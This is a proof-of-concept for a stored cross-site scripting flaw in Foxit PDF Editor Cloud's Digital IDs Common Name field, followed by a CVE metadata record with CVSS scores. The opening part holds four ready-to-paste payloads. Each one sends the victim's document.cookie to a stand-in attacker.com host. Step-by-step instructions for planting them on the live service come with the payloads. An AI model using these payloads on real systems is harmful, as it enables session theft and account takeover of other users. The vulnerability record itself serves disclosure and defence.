CVE-2025-66522

// CVE-2025-66522 PoC - Stored XSS in Foxit PDF Editor Cloud Digital IDs // Create a malicious Digital ID with XSS payload in Common Name field const maliciousCommonName = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">'; // Alternative payloads: // 1. Script tag: <script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script> // 2. Event handler: <svg onload="fetch('https://attacker.com/log?c='+document.cookie)"> // 3. JavaScript URI: <a href="javascript:fetch('https://attacker.com/exec?c='+document.cookie)">Click</a> // Steps to exploit: // 1. Navigate to Foxit PDF Editor Cloud (pdfonline.foxit.com) // 2. Access Digital IDs management section // 3. Create new Digital ID or import certificate // 4. In Common Name field, inject the XSS payload above // 5. Save the Digital ID // 6. When any user views this Digital ID or opens associated PDF, // the malicious script will execute in their browser context console.log('PoC for CVE-2025-66522: Stored XSS via Digital IDs Common Name field');

{"cve": {"id": "CVE-2025-66522", "sourceIdentifier": "14984358-7092-470d-8f34-ade47a7658a2", "published": "2025-12-19T08:15:54.407", "lastModified": "2025-12-23T17:33:47.433", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting (XSS) vulnerability exists in the Digital IDs functionality of the Foxit PDF Editor Cloud (pdfonline.foxit.com). The application does not properly sanitize or encode the Common Name field of Digital IDs before inserting user-supplied content into the DOM. As a result, embedded HTML or JavaScript may execute whenever the Digital IDs dialog is accessed or when the affected PDF is loaded."}], "metrics": {"cvssMetricV31": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "14984358-7092-470d-8f34-ade47a7658a2", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor_cloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-12-01", "matchCriteriaId": "795A6754-5575-418F-B983-8003FDF21077"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "14984358-7092-470d-8f34-ade47a7658a2", "tags": ["Vendor Advisory"]}]}}